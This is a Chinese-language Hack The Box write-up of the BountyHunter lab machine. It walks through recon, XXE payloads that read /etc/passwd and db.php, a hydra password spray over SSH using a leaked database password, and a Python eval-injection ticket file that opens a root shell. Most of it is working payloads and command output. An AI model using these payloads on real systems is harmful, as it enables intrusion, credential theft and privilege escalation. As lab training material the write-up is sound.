HTB-BountyHunter

0x00.简述

0x01.信息收集

可以看到只开放了22与80端口

┌──(root💀kali)-[~/htb/BountyHunter]
└─# nmap -sC -sV -sT 10.10.11.100 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 06:25 EDT
Nmap scan report for 10.10.11.100
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

0x02.访问80端口

这是寻找hacker的平台，并提示使用burp

手动爬虫一下发现一个提交面板

0x03.列一下目录

发现db.php，推测这是一个数据库文件

┌──(root💀kali)-[~/htb/vpn]
└─# gobuster dir -u http://10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.100
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/08/15 01:21:23 Starting gobuster in directory enumeration mode
===============================================================
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/index.php            (Status: 200) [Size: 25169]                                   
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]   
/portal.php           (Status: 200) [Size: 125]                                     
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]      
/db.php               (Status: 200) [Size: 0]                                       
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]       
/server-status        (Status: 403) [Size: 277]                                     
                                                                                    
===============================================================
2021/08/15 02:15:09 Finished
===============================================================
                                                        

但是看不到内容

0x04.burp抓包

主页抓包没什么发现

抓一下log_submit.php，可以发现传输的数据被base64编码了

解码发现使用了xml进行传输

0x05.xml注入

payload

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>demo</cwe>
        <cvss>demo</cvss>
        <reward>demo</reward>
        </bugreport>

base64编码

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+ZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M+CgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+

url编码

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPl0%2bCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2bZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M%2bCgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ%2bCgkJPC9idWdyZXBvcnQ%2b

成功利用，并发现development用户

尝试获取/home/development/user.txt但是失败了

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "file:///home/development/user.txt">]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>demo</cwe>
        <cvss>demo</cvss>
        <reward>demo</reward>
        </bugreport>
        
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQiPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+ZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M+CgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQiPl0%2bCgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPgoJCTxjd2U%2bZGVtbzwvY3dlPgoJCTxjdnNzPmRlbW88L2N2c3M%2bCgkJPHJld2FyZD5kZW1vPC9yZXdhcmQ%2bCgkJPC9idWdyZXBvcnQ%2b

0x06.读取db.php

由于前面发现了db.php，但是不能查看，所以接下来尝试获取db.php文件

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE demo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>demo</cwe>
        <cvss>demo</cvss>
        <reward>demo</reward>
        </bugreport>
        
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ+CgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmRlbW88L2N3ZT4KCQk8Y3Zzcz5kZW1vPC9jdnNzPgoJCTxyZXdhcmQ+ZGVtbzwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg==

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRlbW8gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJwaHA6Ly9maWx0ZXIvY29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS92YXIvd3d3L2h0bWwvZGIucGhwIj5dPgoJCTxidWdyZXBvcnQ%2bCgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmRlbW88L2N3ZT4KCQk8Y3Zzcz5kZW1vPC9jdnNzPgoJCTxyZXdhcmQ%2bZGVtbzwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg%3d%3d

解码，得到数据库用户密码

PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>

0x07.爆破ssh

user：development

pass：m19RoAU0hP41A1sTsq6K

┌──(root💀kali)-[~/htb/BountyHunter]
└─# cat passwd.txt      
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
                                                                                                                                    
┌──(root💀kali)-[~/htb/BountyHunter]
└─# cut -d : -f 1 passwd.txt > userword.txt
                                                                                                                                    
┌──(root💀kali)-[~/htb/BountyHunter]
└─# cat userword.txt                       
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
systemd-network
systemd-resolve
systemd-timesync
messagebus
syslog
_apt
tss
uuidd
tcpdump
landscape
pollinate
sshd
systemd-coredump
development
lxd
usbmux
                                                                                                                                    
┌──(root💀kali)-[~/htb/BountyHunter]
└─# hydra -L userword.txt -p m19RoAU0hP41A1sTsq6K 10.10.11.100 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 01:55:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 34 login tries (l:34/p:1), ~3 tries per task
[DATA] attacking ssh://10.10.11.100:22/
[22][ssh] host: 10.10.11.100   login: development   password: m19RoAU0hP41A1sTsq6K
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 01:56:17

ssh登入

┌──(root💀kali)-[~/htb/BountyHunter]
└─# ssh development@10.10.11.100
The authenticity of host '10.10.11.100 (10.10.11.100)' can't be established.
ECDSA key fingerprint is SHA256:3IaCMSdNq0Q9iu+vTawqvIf84OO0+RYNnsDxDBZI04Y.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.100' (ECDSA) to the list of known hosts.
development@10.10.11.100's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 15 Aug 2021 05:39:27 AM UTC

  System load:           0.0
  Usage of /:            26.5% of 6.83GB
  Memory usage:          35%
  Swap usage:            0%
  Processes:             266
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.100
  IPv6 address for eth0: dead:beef::250:56ff:feb9:66fa


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 15 05:07:51 2021 from 10.10.16.38
-bash-5.0$ pwd
/home/development
-bash-5.0$ ls
code.md  contract.txt  exploit.md  readelf  strings  user.txt
-bash-5.0$ cat user.txt 
**************************************
-bash-5.0$

0x08.提权

sudo -l提权

bash-5.0$ sudo -l
Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
bash-5.0$ 

审计ticketValidator.py

bash-5.0$ cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()
bash-5.0$ 

构建demo.md

# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**10+10+__import__('os').system('/bin/bash')**

或者

# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**32+0+__import__('pty').spawn('/bin/bash')**

提权

bash-5.0$ pwd
/tmp
bash-5.0$ cat demo.md
# Skytrain Inc
## Ticket to Lluna
__Ticket Code:__
**18+10+__import__('os').system('/bin/bash')**
bash-5.0$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
Please enter the path to the ticket file.
demo.md
Destination: Lluna
root@bountyhunter:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@bountyhunter:/tmp# cd
root@bountyhunter:~# ls
root.txt  snap
root@bountyhunter:~# cat root.txt 
******************************************
root@bountyhunter:~#